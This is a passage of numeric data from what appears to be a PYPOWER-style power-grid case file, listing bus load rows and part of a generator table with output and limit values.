8.31533, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 
0.9 ], [475, 1, 40.801178, 8.160236, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [476, 1, 46.112044, 9.222409, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [477, 1, 74.414865, 14.882973, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [478, 1, 93.478633, 18.695727, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [479, 1, 169.404044, 33.880809, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [480, 1, 74.252862, 14.850572, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [481, 1, 64.484622, 12.896924, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [482, 1, 73.219514, 14.643903, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [483, 1, 62.267831, 12.453566, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [484, 1, 48.81495, 9.76299, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [485, 1, 72.916617, 14.583323, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [486, 1, 670.797253, 134.159451, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [487, 1, 169.976923, 33.995385, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [488, 1, 489.780471, 97.956094, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [489, 1, 128.908826, 25.781765, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [490, 1, 40.111619, 8.022324, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [491, 1, 55.153992, 11.030798, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [492, 1, 86.007709, 17.201542, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [493, 1, 110.853642, 22.170728, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [494, 1, 151.506518, 30.301304, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [495, 1, 119.262708, 23.852542, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [496, 1, 8.447576, 1.689515, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [497, 1, 1056.366812, 211.273362, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [498, 1, 49.542651, 9.90853, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [499, 1, 69.153424, 13.830685, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [500, 1, 37.860686, 7.572137, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [501, 1, 64.053753, 12.810751, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [502, 1, 252.806898, 50.56138, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [503, 1, 77.424891, 
15.484978, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [504, 1, 50.701455, 10.140291, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [505, 1, 359.61406, 71.922812, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [506, 1, 112.878428, 22.575686, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [507, 1, 107.371273, 21.474255, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [508, 1, 156.094332, 31.218866, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [509, 1, 205.701368, 41.140274, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [510, 1, 129.953843, 25.990769, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [511, 1, 113.359454, 22.671891, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [512, 1, 74.880918, 14.976184, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [513, 1, 41.251395, 8.250279, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [514, 1, 102.670731, 20.534146, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [515, 1, 91.588391, 18.317678, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [516, 1, 102.465858, 20.493172, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [517, 1, 48.130667, 9.626133, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [518, 1, 271.074962, 54.214992, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [519, 1, 26.678739, 5.335748, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [520, 1, 107.712397, 21.542479, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [521, 1, 97.300872, 19.460174, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [522, 1, 83.309794, 16.661959, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [523, 1, 44.844715, 8.968943, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [524, 1, 130.161391, 26.032278, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [525, 1, 155.066304, 31.013261, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [526, 1, 47.013187, 9.402637, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [527, 1, 51.617176, 10.323435, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [528, 1, 112.659312, 22.531862, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [529, 1, 144.412556, 28.882511, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [530, 1, 61.196143, 12.239229, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [531, 1, 62.220308, 12.444062, 0, 0, 0, 1.0, 0, 
220.0, 0, 1.1, 0.9 ], [532, 1, 59.72065, 11.94413, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [533, 1, 53.516909, 10.703382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [534, 1, 147.629584, 29.525917, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [535, 1, 184.822764, 36.964553, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [536, 1, 145.680168, 29.136034, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [537, 1, 48.461788, 9.692358, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [538, 1, 36.226727, 7.245345, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [539, 1, 38.438784, 7.687757, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [540, 1, 34.612437, 6.922487, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [541, 1, 89.406912, 17.881382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [542, 1, 122.817461, 24.563492, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [543, 1, 67.082293, 13.416459, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [544, 1, 124.941713, 24.988343, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [545, 1, 269.019999, 53.804, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [546, 1, 134.836886, 26.967377, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [547, 1, 174.285535, 34.857107, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [548, 1, 56.416949, 11.28339, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [549, 1, 48.241315, 9.648263, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [550, 1, 39.807289, 7.961458, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [551, 1, 38.373266, 7.674653, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [552, 1, 190.557317, 38.111463, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [553, 1, 1.318362, 0.263672, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [554, 1, 193.054456, 38.610891, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [555, 1, 73.555885, 14.711177, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [556, 1, 113.793402, 22.75868, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [557, 1, 241.770041, 48.354008, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [558, 1, 142.561806, 28.512361, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [559, 1, 76.297706, 15.259541, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [560, 1, 119.195067, 
23.839013, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [561, 1, 65.363095, 13.072619, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [562, 1, 178.567079, 35.713416, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [563, 1, 125.547209, 25.109442, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [564, 1, 247.893314, 49.578663, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [565, 1, 187.047789, 37.409558, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [566, 1, 0.300439, 0.060088, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [567, 1, 304.054569, 60.810914, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [568, 1, 281.17691, 56.235382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [569, 1, 197.838049, 39.56761, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [570, 1, 308.86082, 61.772164, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [571, 1, 227.406839, 45.481368, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [572, 1, 401.107695, 80.221539, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [573, 1, 116.757191, 23.351438, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [574, 1, 222.467036, 44.493407, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [575, 1, 4.180555, 0.836111, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [576, 1, 270.518423, 54.103685, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [577, 1, 298.21836, 59.643672, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [578, 1, 284.728905, 56.945781, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [579, 1, 103.876875, 20.775375, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [580, 1, 21.62562, 4.325124, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [581, 1, 0.124263, 0.024853, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [582, 1, 78.241603, 15.648321, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [583, 1, 89.740243, 17.948049, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [584, 1, 51.488653, 10.297731, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [585, 1, 89.390638, 17.878128, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ] ]) ppc["gen"] = array([ [586, 272.0, 0, 9999, -9999, 1.0, 100, 1, 272.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [589, 63.1, 0, 9999, -9999, 1.0, 100, 1, 63.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0], [590, 38.0, 0, 9999, -9999, 1.0, 100, 1, 38.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [593, 11.1, 0, 9999, -9999, 1.0, 100, 1, 11.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [594, 19.0, 0, 9999, -9999, 1.0, 100, 1, 19.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [595, 1077.901512, 0, 9999, -9999, 1.0, 100, 1, 4730.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [597, 95.0, 0, 9999, -9999, 1.0, 100, 1, 95.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [598, 12.0, 0, 9999, -9999, 1.0, 100, 1, 12.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [599, 9.3, 0, 9999, -9999, 1.0, 100, 1, 9.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [600, 16.9, 0, 9999, -9999, 1.0, 100, 1, 16.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [601, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [602, 24.6, 0, 9999, -9999, 1.0, 100, 1, 24.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [603, 784.389663, 0, 9999, -9999, 1.0, 100, 1, 3455.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [607, 1800.0, 0, 9999, -9999, 1.0, 100, 1, 1800.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [608, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [609, 36.4, 0, 9999, -9999, 1.0, 100, 1, 36.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [610, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [611, 100.943054, 0, 9999, -9999, 1.0, 100, 1, 150.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [612, 30.0, 0, 9999, -9999, 1.0, 100, 1, 30.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [613, 85.0, 0, 9999, -9999, 1.0, 100, 1, 85.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [614, 30.0, 0, 9999, -9999, 1.0, 100, 1, 30.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [616, 29.0, 0, 9999, -9999, 1.0, 100, 1, 29.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [617, 137.0, 0, 9999, -9999, 1.0, 100, 1, 137.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [618, 33.4, 0, 9999, -9999, 1.0, 100, 1, 33.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [619, 118.0, 0, 9999, -9999, 1.0, 100, 1, 118.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0], [621, 765.0, 0, 9999, -9999, 1.0, 100, 1, 765.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [623, 760.0, 0, 9999, -9999, 1.0, 100, 1, 760.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [624, 27.0, 0, 9999, -9999, 1.0, 100, 1, 27.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [628, 449.0, 0, 9999, -9999, 1.0, 100, 1, 449.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [629, 75.3, 0, 9999, -9999, 1.0, 100, 1, 75.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [631, 79.8, 0, 9999, -9999, 1.0, 100, 1, 79.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [632, 45.1, 0, 9999, -9999, 1.0, 100, 1, 45.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [637, 53.7, 0, 9999, -9999, 1.0, 100, 1, 53.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [638, 128.7, 0, 9999, -9999, 1.0, 100, 1, 128.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [639, 15.8, 0, 9999, -9999, 1.0, 100, 1, 15.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [640, 12.0, 0, 9999, -9999, 1.0, 100, 1, 12.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [641, 12.6, 0, 9999, -9999, 1.0, 100, 1, 12.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [642, 28.9, 0, 9999, -9999, 1.0, 100, 1, 28.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [643, 857.0, 0, 9999, -9999, 1.0, 100, 1, 857.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [646, 103.0, 0, 9999, -9999, 1.0, 100, 1, 103.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [647, 14.0, 0, 9999, -9999, 1.0, 100, 1, 14.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [650, 1324.5, 0, 9999, -9999, 1.0, 100, 1, 1324.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [652, 46.9, 0, 9999, -9999, 1.0, 100, 1, 46.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [655, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [657, 38.0, 0, 9999, -9999, 1.0, 100, 1, 38.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [658, 95.0, 0, 9999, -9999, 1.0, 100, 1, 95.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [661, 32.7, 0, 9999, -9999, 1.0, 100, 1, 32.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [662, 9.2, 0, 9999, -9999, 1.0, 100, 1, 9.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0], [663, 15.0, 0, 9999, -9999, 1.0, 100, 1, 15.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [666, 28.9, 0, 9999, -9999, 1.0, 100, 1, 28.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [668, 766.0, 0, 9999, -9999, 1.0, 100, 1, 766.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [670, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [672, 33.1, 0, 9999, -9999, 1.0, 100, 1, 33.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [675, 10.6, 0, 9999, -9999, 1.0, 100, 1, 10.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [676, 370.0, 0, 9999, -9999, 1.0, 100, 1, 370.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [677, 13.4, 0, 9999, -9999, 1.0, 100, 1, 13.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [678, 1017.0, 0, 9999, -9999, 1.0, 100, 1, 1017.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [679, 544.843814, 0, 9999, -9999, 1.0, 100, 1, 695.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [681, 40.1, 0, 9999, -9999, 1.0, 100, 1, 40.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [683, 27.5, 0, 9999, -9999, 1.0, 100, 1, 27.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [685, 39.347387, 0, 9999, -9999, 1.0, 100, 1, 58.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [687, 1329.0, 0, 9999, -9999, 1.0, 100, 1, 1329.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [689, 310.0, 0, 9999, -9999, 1.0, 100, 1, 310.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [691, 26.0, 0, 9999, -9999, 1.0, 100, 1, 26.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [693, 194.0, 0, 9999, -9999, 1.0, 100, 1, 194.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [694, 16.4, 0, 9999, -9999, 1.0, 100, 1, 16.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [695, 14.7, 0, 9999, -9999, 1.0, 100, 1, 14.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [696, 721.0, 0, 9999, -9999, 1.0, 100, 1, 721.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [697, 11.6, 0, 9999, -9999, 1.0, 100, 1, 11.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [698, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [701, 47.2, 0, 9999, -9999, 1.0, 100, 1, 47.2, 0.0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0], [702, 73.4, 0, 9999, -9999, 1.0, 100, 1, 73.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [704, 508.0, 0, 9999, -9999, 1.0, 100, 1, 508.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [705, 17.0, 0, 9999, -9999, 1.0, 100, 1, 17.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [707, 34.0, 0, 9999, -9999, 1.0, 100, 1, 34.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [708, 7.8, 0, 9999, -9999, 1.0, 100, 1, 7.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [711, 107.131712, 0, 9999, -9999, 1.0, 100, 1, 176.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [713, 13.4, 0, 9999, -9999, 1.0, 100, 1, 13.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [714, 15.0, 0, 9999, -9999, 1.0, 100, 1, 15.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [716, 0.1, 0, 9999, -9999, 1.0, 100, 1, 0.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [717, 11.0, 0, 9999, -9999, 1.0, 100, 1, 11.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [719, 1332.487614, 0, 9999, -9999, 1.0, 100, 1, 1958.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [721, 4.0, 0, 9999, -9999, 1.0, 100, 1, 4.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [722, 20.7, 0, 9999, -9999, 1.0, 100, 1, 20.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [723, 19.7, 0, 9999, -9999, 1.0, 100, 1, 19.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [724, 12.1, 0, 9999, -9999, 1.0, 100, 1, 12.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [725, 800.0, 0, 9999, -9999, 1.0, 100, 1, 800.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [727, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [728, 510.0, 0, 9999, -9999, 1.0, 100, 1, 510.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [730, 633.2, 0, 9999, -9999, 1.0, 100, 1, 633.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [731, 771.665434, 0, 9999, -9999, 1.0, 100, 1, 895.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [732, 14.6, 0, 9999, -9999, 1.0, 100, 1, 14.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [733, 396.6, 0, 9999, -9999, 1.0, 100, 1, 396.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [735, 84.8, 0, 9999, -9999, 1.0, 100, 1, 84.8, 0.0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0], [737, 28.0, 0, 9999, -9999, 1.0, 100, 1, 28.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [738, 138.5, 0, 9999, -9999, 1.0, 100, 1, 138.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [739, 59.9, 0, 9999, -9999, 1.0, 100, 1, 59.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [741, 214.0, 0, 9999, -9999, 1.0, 100, 1, 214.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [742, 9.0, 0, 9999, -9999, 1.0, 100, 1, 9.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [743, 740.211485, 0, 9999, -9999, 1.0, 100, 1, 1410.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [745, 42.0, 0, 9999, -9999, 1.0, 100, 1, 42.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [746, 100.0, 0, 9999, -9999, 1.0, 100, 1, 100.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [747, 12.5, 0, 9999, -9999, 1.0, 100, 1, 12.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [748, 110.0, 0, 9999, -9999, 1.0, 100, 1, 110.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [749, 16.0, 0, 9999, -9999, 1.0, 100, 1, 16.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [750, 90.8, 0, 9999, -9999, 1.0, 100, 1, 90.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [753, 301.078058, 0, 9999, -9999, 1.0, 100, 1, 311.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [758, 18.5, 0, 9999, -9999, 1.0, 100, 1, 18.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [760, 337.515183, 0, 9999, -9999, 1.0, 100, 1, 794.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [761, 15.7, 0, 9999, -9999, 1.0, 100, 1, 15.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [762, 1105.0, 0, 9999, -9999, 1.0, 100, 1, 1105.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [763, 20.3, 0, 9999, -9999, 1.0, 100, 1, 20.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [765, 59.0, 0, 9999, -9999, 1.0, 100, 1, 59.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [767, 11.2, 0, 9999, -9999, 1.0, 100, 1, 11.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [769, 43.3, 0, 9999, -9999, 1.0, 100, 1, 43.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [771, 690.0, 0, 9999, -9999, 1.0, 100, 1, 690.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [772, 18.8, 0, 9999, -9999, 1.0, 100, 1, 18.8, 0.0, 
